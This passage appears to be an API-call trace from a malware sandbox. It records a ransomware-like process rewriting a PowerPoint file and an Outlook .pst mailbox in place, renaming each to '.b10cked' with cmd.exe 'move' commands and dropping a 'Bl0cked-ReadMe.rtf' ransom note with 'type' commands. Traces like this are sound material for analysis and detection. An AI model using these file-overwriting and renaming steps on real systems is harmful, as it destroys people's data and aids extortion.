lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c5a [0236.578] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c58, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c58, lpOverlapped=0x0) returned 1 [0236.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ngdm.pptx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0236.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ngdm.pptx", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ngdm.pptx", lpUsedDefaultChar=0x0) returned 9 [0236.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8b2 [0236.582] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0236.582] CloseHandle (hObject=0x120) returned 1 [0236.583] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Ngdm.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT") returned 0x24 [0236.584] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0236.584] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbf8, dwThreadId=0xbc8)) returned 1 [0236.598] CloseHandle (hObject=0x1b4) returned 1 [0236.598] CloseHandle (hObject=0x120) returned 1 [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0236.598] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount2=37) returned 1 [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0236.598] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0236.598] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0236.598] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0236.598] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.598] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0236.599] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0236.599] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.599] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc50, dwThreadId=0x678)) returned 1 [0236.602] CloseHandle (hObject=0x1b4) returned 1 [0236.602] CloseHandle (hObject=0x120) returned 1 [0236.602] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0236.602] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.602] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.602] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.602] ReleaseMutex (hMutex=0xf8) returned 1 [0236.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29339305155) returned 1 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x41f18 [0236.605] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x42400 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x42400 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.607] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.921] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.928] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0236.929] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0236.930] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x22400 [0236.930] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.931] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.932] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0236.932] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x22400 [0236.932] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.933] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.933] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0236.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feasf@efw.com.pst", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0236.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feasf@efw.com.pst", cchWideChar=17, lpMultiByteStr=0x1328834, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feasf@efw.com.pst", lpUsedDefaultChar=0x0) returned 17 [0236.937] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x42400 [0236.937] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0236.937] CloseHandle (hObject=0x120) returned 1 [0236.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST") returned 0x2f [0236.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.940] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa70, dwThreadId=0x170)) returned 1 [0236.945] CloseHandle (hObject=0x1b4) returned 1 [0236.945] CloseHandle (hObject=0x120) returned 1 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\") returned 0x29 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\") returned 0x29 [0236.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0236.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\OUTLOOK FILES\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0236.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0236.946] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0236.946] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.946] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0236.946] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbd8, dwThreadId=0xf7c)) returned 1 [0236.951] CloseHandle (hObject=0x1b4) returned 1 [0236.951] CloseHandle 